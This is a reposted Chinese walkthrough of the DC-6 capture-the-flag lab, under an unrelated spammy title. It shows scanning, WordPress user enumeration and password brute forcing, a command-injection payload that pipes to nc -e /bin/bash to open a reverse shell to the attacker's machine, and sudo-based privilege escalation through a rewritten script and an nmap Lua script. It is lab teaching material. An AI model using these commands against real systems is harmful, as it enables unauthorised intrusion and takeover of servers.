您的位置:首页 > 文旅 > 旅游 > 武汉建设网站建站_建筑企业网站源码_百度免费下载_谷歌浏览器下载安装2021最新版

武汉建设网站建站_建筑企业网站源码_百度免费下载_谷歌浏览器下载安装2021最新版

2024/12/21 23:41:45 来源:https://blog.csdn.net/qq_45776114/article/details/142831210  浏览:    关键词:武汉建设网站建站_建筑企业网站源码_百度免费下载_谷歌浏览器下载安装2021最新版
武汉建设网站建站_建筑企业网站源码_百度免费下载_谷歌浏览器下载安装2021最新版

文章目录

  • 1. 靶场搭建
  • 2. 信息收集
    • 2.1 确定靶机ip
    • 2.2 主机信息收集
    • 2.3 主机目录扫描
    • 2.4 网站用户名和密码爆破
  • 3. 反弹shell
  • 4. 提权

1. 靶场搭建

靶场源地址

检验下载文件的检验码,对比没问题使用vmware打开


# windwos 命令
Get-FileHash <filePath> -Algorithm MD5
# linux
md5sum filepath

2. 信息收集

2.1 确定靶机ip

根据虚拟机网络适配器模式,确定靶机所在网段。使用nmap进行网段存活主机,排除法确定靶机ip.

nmap -sn 192.168.6.100/24

1728460476155.png
通过排除法确定靶机ip为192.168.6.101

2.2 主机信息收集

通过nmap探测靶机开放端口和端口对应服务

nmap -Ap 1-65535  192.168.6.101

e58f0a7d-9386-4492-9e53-abe16de8b184.jpeg
确定开放端口:

  • 22:ssh服务
  • 80: http服务

访问http://192.168.6.101时,url自动重定向到http://wordy, 修改/etc/hosts添加主机名和ip的映射.成功访问,发现是wordpress框架。

2.3 主机目录扫描

# 目录扫描
dirsearch -u http://wordy

找到登录页面地址,http://wordy/wp-login.php
3dba2ab7-a173-4ff7-a0a7-5bd4c21d6859.jpeg

2.4 网站用户名和密码爆破

这个靶场和dc2靶场使用相同的框架,接下来处理和dc-2靶场差不多方法获取用户名,发现成功获取到用户,加上靶场原页面提供了密码字典的线索,直接进行爆破.可以参考之前的文章DC-2靶场

# 获取网站用户名
wpscan --url http://wordy -e u 
# 爆破
gunzip /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy -e u -P passsword.txt

d175f13f-585e-4052-8679-8c31c0ddeec1.jpeg

成功获取到账号密码
2708e77c-1556-4394-8cbf-ed27b85bda2d.jpeg

3. 反弹shell

登录成功之后,发现后台存在图中可以执行命令。这里输入框长度有限制,可以直接使用浏览器工具修改输入框的最大长度。
0ead5b13-7cb2-4950-8ff1-c01fe54823b9.jpeg

85f6da03-9a16-42f2-8981-6403dc407b5e.jpeg

# kali中执行
nc -lvp 8888
# 输入框中输入
127.0.0.1|nc 192.168.6.106 8888  -e /bin/bash

反弹shell成功,执行python代码创建一个伪终端,提高交互.
7ebc3204-6a85-4f77-b382-b83fc519550e.jpeg

# 创建一个伪终端,提高命令窗口交互
python -c 'import pty; pty.spawn("/bin/bash")'

4. 提权

获取shell之后,在`/home/mark/stuff/things-to-do.txt中发现graham的用户账号密码.然后使用ssh进行登录

b63ad010-cd92-4264-9d79-22bdf5bc51e7.jpeg
`

graphm登录成功之后,执行sudo -l发现graphm可以使用sudo 以jens身份执行脚本。并且graphm有backups.sh的修改权限。

da92cbfe-c897-4714-9c6f-ee8d622f9061.jpeg

使用以下命令获取jens的权限,成功切换至jens身份.

echo "/bin/bash" > /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

4e5d9170-075b-48cc-b414-941e33073aa3.jpeg

执行sudo -l,查看sudo权限,发现当前用户可以无密码以root身份执行nmap。尝试使用namp进行提权。

ede72fd1-0851-4bf2-b807-b853b793b71a.jpeg

vim test.lua
# 在lua脚本中输入
os.execute("/bin/bash")
sudo nmap --script test.lua

成功获取root权限.
99339444-e5ec-4841-a5ea-828ab1fe5fa2.jpeg

获取目标flag内容

7a03b4d2-41fb-437c-925e-be733d610027.jpeg

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com